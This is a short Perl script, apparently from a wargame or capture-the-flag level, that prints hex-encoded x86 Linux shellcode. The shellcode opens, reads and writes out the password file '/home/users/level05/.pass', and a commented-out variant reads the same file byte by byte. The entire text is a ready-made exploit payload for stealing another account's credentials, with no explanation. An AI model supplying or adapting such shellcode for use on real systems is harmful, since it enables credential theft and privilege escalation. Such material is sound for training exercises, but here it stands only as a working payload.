#!/usr/bin/perl

print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x70\x61\x73\x73\x68\x30\x35\x2f"
	. "\x2e\x68\x65\x76\x65\x6c\x68\x72\x73\x2f\x6c\x68\x2f\x75\x73\x65\x68\x68"
	. "\x6f\x6d\x65\x68\x2f\x2f\x2f\x2f\x89\xe3\xb0\x05\xcd\x80\x89\xc3\x31\xc0"
	. "\x83\xec\x28\x8d\x0c\x24\xb2\x28\xb0\x03\xcd\x80\x31\xc0\xb3\x01\xb0\x04"
	. "\xcd\x80";

#print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89"
#	. "\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c"
#	. "\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd"
#	. "\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff"
#	. "/home/users/level05/.pass"
